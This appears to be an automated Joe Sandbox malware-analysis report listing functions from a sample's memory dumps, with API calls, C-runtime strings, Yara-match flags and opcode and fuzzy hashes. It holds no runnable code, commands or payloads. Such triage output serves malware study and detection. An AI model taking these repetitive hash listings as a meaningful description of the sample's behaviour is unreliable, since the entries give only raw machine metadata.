                                • Opcode ID: a98847472c101b993253f90d20c06eb9093f38dbc27449be3c0f5c7a6e23c151
                                • Instruction ID: 85d65669da18c2917e6e3e9b40ba5ef8a5098ba399283d423beb3edc5baabddd
                                • Opcode Fuzzy Hash: a98847472c101b993253f90d20c06eb9093f38dbc27449be3c0f5c7a6e23c151
                                • Instruction Fuzzy Hash: DA119BB1B40104BBDB10DF95ED46F5F37A4AB94714F10856AFA08BB2C2D6B8D9108B98
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: _memset
                                • String ID: D
                                • API String ID: 2102423945-2746444292
                                • Opcode ID: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                                • Instruction ID: 9e43dfd2e10ff055f32f772e6374569b431b6508736e147b85de5b9c72ffcc43
                                • Opcode Fuzzy Hash: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                                • Instruction Fuzzy Hash: 48E15D71D1022AEACF24DFE0CD49FEEB7B8BF04304F144169E909A6194EB769A49CF54
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: _memset
                                • String ID: $$$(
                                • API String ID: 2102423945-3551151888
                                • Opcode ID: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                                • Instruction ID: 18e12efcc15b8212b7334cdf990d6b62abef512b5a68538151ee3a69cc9298c2
                                • Opcode Fuzzy Hash: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                                • Instruction Fuzzy Hash: 4191AC71D10219EAEF21CFE0C849BEEBBF5AF15304F144169D406B7284DBB65A48CFA5
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: __aulldiv__aullrem_get_int64_arg
                                • String ID: 9
                                • API String ID: 3120068967-2366072709
                                • Opcode ID: 561fe5e1ff640314796f634126af73b80010c38c858009088e47a62c609df131
                                • Instruction ID: 9177e0fe409aab1d78ff5bb01105178d717b7215dc15eb9d0700ac50e472d47c
                                • Opcode Fuzzy Hash: 561fe5e1ff640314796f634126af73b80010c38c858009088e47a62c609df131
                                • Instruction Fuzzy Hash: 9341F8B1E5012ADFDB24CF48C841BAEB7B5BF85314F1040AAE148B7282D7785E81CF59
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: __aulldiv__aullrem_get_int64_arg
                                • String ID: 9
                                • API String ID: 3120068967-2366072709
                                • Opcode ID: 561fe5e1ff640314796f634126af73b80010c38c858009088e47a62c609df131
                                • Instruction ID: f4e2372d1ef2cc0e6896abbae7fcf29c10d11fa0f0b1cde215167b7ef8af7524
                                • Opcode Fuzzy Hash: 561fe5e1ff640314796f634126af73b80010c38c858009088e47a62c609df131
                                • Instruction Fuzzy Hash: 2841E6B1A102299FDB24CF58C841B9FB7B5FF85314F1040A99258BB281D7785E85CF9A
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: __aulldiv__aullrem_get_int64_arg
                                • String ID: 9
                                • API String ID: 3120068967-2366072709
                                • Opcode ID: 246765e91aea20986e4a9df16f65070b244bee9e6e1a545cb208d8e74e9bcf73
                                • Instruction ID: cd0af96aba5d2941fb41913c64e0471a9dc0971cc032b4ede55a07fa3a4f1429
                                • Opcode Fuzzy Hash: 246765e91aea20986e4a9df16f65070b244bee9e6e1a545cb208d8e74e9bcf73
                                • Instruction Fuzzy Hash: 7841D4B1D19229DFEB24CF59CC89BEEB7B5BB84304F10859AE049A7240D7389E85CF45
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: __aulldiv__aullrem_get_int64_arg
                                • String ID: 9
                                • API String ID: 3120068967-2366072709
                                • Opcode ID: f2b4ca237a238aae3c26a87df61934f62392bb24527560412936e188f498dd5d
                                • Instruction ID: 46614499eb2dd8ef096e281f2e7dc0df823b3af95b098c6a1be0907913641e05
                                • Opcode Fuzzy Hash: f2b4ca237a238aae3c26a87df61934f62392bb24527560412936e188f498dd5d
                                • Instruction Fuzzy Hash: 4141EAB1E5012ADFDB24CF48C981B9EB7B5FF85314F1041AAE148A7282C7385E81CF59
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: __aulldiv__aullrem_get_int64_arg
                                • String ID: 9
                                • API String ID: 3120068967-2366072709
                                • Opcode ID: f2b4ca237a238aae3c26a87df61934f62392bb24527560412936e188f498dd5d
                                • Instruction ID: ddabfec3a7046ed8c65c3bd1ecccacda018f4a6832024a0e2bf443473914f47f
                                • Opcode Fuzzy Hash: f2b4ca237a238aae3c26a87df61934f62392bb24527560412936e188f498dd5d
                                • Instruction Fuzzy Hash: CD41E5B1A102299FDB24CF58C881BAFB7B5FB85314F1081A9D258B7281D7385E85CF99
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: _get_int64_arg$__aulldiv__aullrem
                                • String ID: 9
                                • API String ID: 2124759748-2366072709
                                • Opcode ID: 5f9e40789b7f7708f9b285234ed8a6e8849f0e33ec4d5cbd22c2f7085c305ed1
                                • Instruction ID: 84a59e8b8dfbf795f142f8643cff091771d4c4e11fb83c0281cafb02352f1a82
                                • Opcode Fuzzy Hash: 5f9e40789b7f7708f9b285234ed8a6e8849f0e33ec4d5cbd22c2f7085c305ed1
                                • Instruction Fuzzy Hash: 9C41E8B1E5012ADFDB24CF58C981BDEB7B5BF85314F1041AAE248A7282C7385E81CF59
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: _get_int64_arg$__aulldiv__aullrem
                                • String ID: 9
                                • API String ID: 2124759748-2366072709
                                • Opcode ID: 5f9e40789b7f7708f9b285234ed8a6e8849f0e33ec4d5cbd22c2f7085c305ed1
                                • Instruction ID: e3b60444fb68a155374124565f1552c669e3def674ae0a491053beb8008b26d0
                                • Opcode Fuzzy Hash: 5f9e40789b7f7708f9b285234ed8a6e8849f0e33ec4d5cbd22c2f7085c305ed1
                                • Instruction Fuzzy Hash: EF41E6B1A102299FDB24CF58C981B9FB7B5FB85314F1041AAA258B7281D7385E81CF5E
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: _get_int64_arg$__aulldiv__aullrem
                                • String ID: 9
                                • API String ID: 2124759748-2366072709
                                • Opcode ID: 8dd5430ec6d529783fa8057ea78a9825fddb7b68d4cf03b946cfbfa0456bc17b
                                • Instruction ID: 2fb8b85ceefbb1adc23e365f0c49b7bbe8d68d6f2320797511d85c2a919ea4e5
                                • Opcode Fuzzy Hash: 8dd5430ec6d529783fa8057ea78a9825fddb7b68d4cf03b946cfbfa0456bc17b
                                • Instruction Fuzzy Hash: 2541D5B1D19229DFEB24CF58C889BEEB7B5BB44304F10859AE049A7240D7389EC5CF45
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: _wcsnlen
                                • String ID: U
                                • API String ID: 3628947076-3372436214
                                • Opcode ID: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
                                • Instruction ID: 2de81546a9a08d9f1e3bd47ff866361e2df67fd940e29239687069930e2b62b3
                                • Opcode Fuzzy Hash: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
                                • Instruction Fuzzy Hash: CB215BB263430D7AEB019AE49C45BBE73ADDB49350F900165F90CCA198FF71EA508AA4
                                APIs
                                Strings
                                • pHead->nBlockUse == nBlockUse, xrefs: 004036CB
                                • f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c, xrefs: 004036D7
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: __free_base_memset
                                • String ID: f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c$pHead->nBlockUse == nBlockUse
                                • API String ID: 2669475236-3676899318
                                • Opcode ID: 2fe85c2b0d0e1c064366268f3053e93a23d3b5552b4b10654f6680eeaaabf071
                                • Instruction ID: 5616b5ce360a9c6ef88d89632992d078fda9e73a76ea70273ceddcd21d78e2d5
                                • Opcode Fuzzy Hash: 2fe85c2b0d0e1c064366268f3053e93a23d3b5552b4b10654f6680eeaaabf071
                                • Instruction Fuzzy Hash: 7B2124B8A00104EFC714CF55D681A6A77B6BB85309F34C5A9D4052B395C779EF02DF89
                                APIs
                                Strings
                                • _pLastBlock == pHead, xrefs: 0040372E
                                • f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c, xrefs: 0040373A
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: __free_base_memset
                                • String ID: _pLastBlock == pHead$f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c
                                • API String ID: 2669475236-449961717
                                • Opcode ID: dbef88f62b027a873f7529350cab3b92387cfec11708301133335f582734b04c
                                • Instruction ID: 658fa22ba22eace41271ecb2dbfe4b3bb5af4cff2e4683ec24a46d5b320643a7
                                • Opcode Fuzzy Hash: dbef88f62b027a873f7529350cab3b92387cfec11708301133335f582734b04c
                                • Instruction Fuzzy Hash: 8C0184F8A00104EBC704CB55D981E5AB7B9BB85709F3086A9E50567392D235EF02DB89
                                APIs
                                • __invalid_parameter.LIBCMTD ref: 00419ED7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: __invalid_parameter
                                • String ID: _wcstombs_l_helper$f:\dd\vctools\crt_bld\self_x86\crt\src\wcstombs.c$pwcs != NULL
                                • API String ID: 3730194576-2632876063
                                • Opcode ID: 0dc89c6f5ec4772fa89874f9ef2e2cc502443b01295abe8e99ab1f4456162202
                                • Instruction ID: a0282508e20a1d91789113daefc18912f89b6930a82126994f97794c5e94db61
                                • Opcode Fuzzy Hash: 0dc89c6f5ec4772fa89874f9ef2e2cc502443b01295abe8e99ab1f4456162202
                                • Instruction Fuzzy Hash: F3F0C870F80328AAEB20BE61FD07B9B31506750714F12056BF906251C2D3FE49D0856D
                                APIs
                                • __invalid_parameter.LIBCMTD ref: 0041A3CB
                                Strings
                                • _wcstombs_s_l, xrefs: 0041A3C1
                                • (dst != NULL && sizeInBytes > 0) || (dst == NULL && sizeInBytes == 0), xrefs: 0041A383, 0041A3C6
                                • f:\dd\vctools\crt_bld\self_x86\crt\src\wcstombs.c, xrefs: 0041A38F, 0041A3BC
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: __invalid_parameter
                                • String ID: (dst != NULL && sizeInBytes > 0) || (dst == NULL && sizeInBytes == 0)$_wcstombs_s_l$f:\dd\vctools\crt_bld\self_x86\crt\src\wcstombs.c
                                • API String ID: 3730194576-625432840
                                • Opcode ID: 06c57a437acdbe8268f786f5554a6d1182b17f726ad288dcbbf4ec8d850351a7
                                • Instruction ID: 6fcc669b4b5cd66ad1181ab845c00de6b54bb55e8edcb972f8a1cf158ff4aa31
                                • Opcode Fuzzy Hash: 06c57a437acdbe8268f786f5554a6d1182b17f726ad288dcbbf4ec8d850351a7
                                • Instruction Fuzzy Hash: CE016270A4131CEAEB206E80EC067EFB260AB10719F51451BE924252C1D3FD46D4CA9E
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: _memset
                                • String ID: p2Q
                                • API String ID: 2102423945-1521255505
                                • Opcode ID: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                                • Instruction ID: 4548f819cf05fa721a7f8beb3c83d8e4fd1b77eead0652ad120ed9afd1acc253
                                • Opcode Fuzzy Hash: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                                • Instruction Fuzzy Hash: A8F0ED78698754A5F7227B90BC26B857E917B31B09F104088E1182E2E5D3FD238CA79A
                                APIs
                                • ExitProcess.KERNEL32 ref: 0041F66C
                                • GetLastError.KERNEL32 ref: 0041F672
                                • SetLastError.KERNEL32(00000000), ref: 0041F67A
                                • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 0041F687
                                • GetProcAddress.KERNEL32(?,LocalAlloc), ref: 0041F69D
                                • WriteConsoleA.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041F6EF
                                • GetProcessPriorityBoost.KERNEL32(00000000,00000000), ref: 0041F6F9
                                • SetFileApisToANSI.KERNEL32 ref: 0041F731
                                • OpenSemaphoreW.KERNEL32(00000000,00000000,00000000), ref: 0041F761
                                • SetSystemTime.KERNEL32(?), ref: 0041F792
                                • GetPrivateProfileIntA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041F7DA
                                • GetSystemDefaultLangID.KERNEL32 ref: 0041F7E0
                                • GetUserDefaultLCID.KERNEL32 ref: 0041F7E6
                                • SetVolumeLabelW.KERNEL32(00000000,00000000), ref: 0041F7F0
                                • WaitForMultipleObjects.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041F7FE
                                • OpenMutexW.KERNEL32(00000000,00000000,00000000), ref: 0041F84B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: DefaultErrorLastOpenProcessSystem$AddressApisBoostConsoleExitFileHandleLabelLangModuleMultipleMutexObjectsPriorityPrivateProcProfileSemaphoreTimeUserVolumeWaitWrite
                                • String ID: l
                                • API String ID: 653065421-2517025534
                                • Opcode ID: f7e626ff5579c3021eee9ff688d97dda4ed926112a089f5786acab6fcf72fc19
                                • Instruction ID: 24218bfe697cf9b6beaa59aaaf5e6f95f113fdc627a646cb844e26da95f80290
                                • Opcode Fuzzy Hash: f7e626ff5579c3021eee9ff688d97dda4ed926112a089f5786acab6fcf72fc19
                                • Instruction Fuzzy Hash: 27E01A30A06614CBDB605B60EE097D477F1EB24316F4480BED10961170DB780ECB8F5E
                                APIs
                                • std::exception::exception.LIBCMT ref: 0225FBF1
                                  • Part of subcall function 0224169C: std::exception::_Copy_str.LIBCMT ref: 022416B5
                                • __CxxThrowException@8.LIBCMT ref: 0225FC06
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Copy_strException@8Throwstd::exception::_std::exception::exception
                                • String ID: TeM$TeM
                                • API String ID: 3662862379-3870166017
                                • Opcode ID: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                                • Instruction ID: 3cd2aca9c7b4cbeb1c62a993a0f4e0202a46b02cec2f1cbb44b527e4dbbc041b
                                • Opcode Fuzzy Hash: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                                • Instruction Fuzzy Hash: 59D067B5C1030CBBCB04EFA5D459CDDBBB9AA04744B408466A91897245EA74E3998F94
                                APIs
                                  • Part of subcall function 0223197D: __wfsopen.LIBCMT ref: 02231988
                                • _fgetws.LIBCMT ref: 0221D15C
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: __wfsopen_fgetws
                                • String ID:
                                • API String ID: 853134316-0
                                • Opcode ID: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                                • Instruction ID: 33f3d2ee45880dfa582efd98ba17f6baac15f36af19708685b89d6f83a805c70
                                • Opcode Fuzzy Hash: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                                • Instruction Fuzzy Hash: 1A91A1B1D2031AEBCB25DFE4CC44BAEB7F5BF14304F140529E815A7245E7B6AA14CBA1
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: _malloc$__except_handler4_fprintf
                                • String ID:
                                • API String ID: 1783060780-0
                                • Opcode ID: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
                                • Instruction ID: 724a4720dfe1e748edc227a24592de93b31c656b1134eac511799c75364f0604
                                • Opcode Fuzzy Hash: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
                                • Instruction Fuzzy Hash: F0A16FB1C10348EBEF11EFE4C849BEEBBB6AF14304F140128D40576295D7B65A98CFA6
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: _memset$__filbuf__getptd_noexit__read_nolock
                                • String ID:
                                • API String ID: 2974526305-0
                                • Opcode ID: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
                                • Instruction ID: 264030b789cc007f18cf57b33973c5a6856e714930f47f99dc449cecc1c1f30a
                                • Opcode Fuzzy Hash: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
                                • Instruction Fuzzy Hash: E85193F0A20306DBDB268FF988806AE77B6BF40724F148729EC35962D8D7709D51CB40
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                • String ID:
                                • API String ID: 3016257755-0
                                • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                • Instruction ID: 704adabef952dd1b09671032d883304a57e33983cfa6c46ac939016620490a52
                                • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                • Instruction Fuzzy Hash: 6001363642025ABBCF125EC4DC11EEE3F62BF19358B488415FE5958828D376C5B2AB81
                                APIs
                                • ___BuildCatchObject.LIBCMT ref: 022D7A4B
                                  • Part of subcall function 022D8140: ___BuildCatchObjectHelper.LIBCMT ref: 022D8172
                                  • Part of subcall function 022D8140: ___AdjustPointer.LIBCMT ref: 022D8189
                                • _UnwindNestedFrames.LIBCMT ref: 022D7A62
                                • ___FrameUnwindToState.LIBCMT ref: 022D7A74
                                • CallCatchBlock.LIBCMT ref: 022D7A98
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                                • String ID:
                                • API String ID: 2901542994-0
                                • Opcode ID: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                                • Instruction ID: 80b361bd606cbc40719eb4f5f96ffbd74a5bc2c22cd7752448e9b903c02e273b
                                • Opcode Fuzzy Hash: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
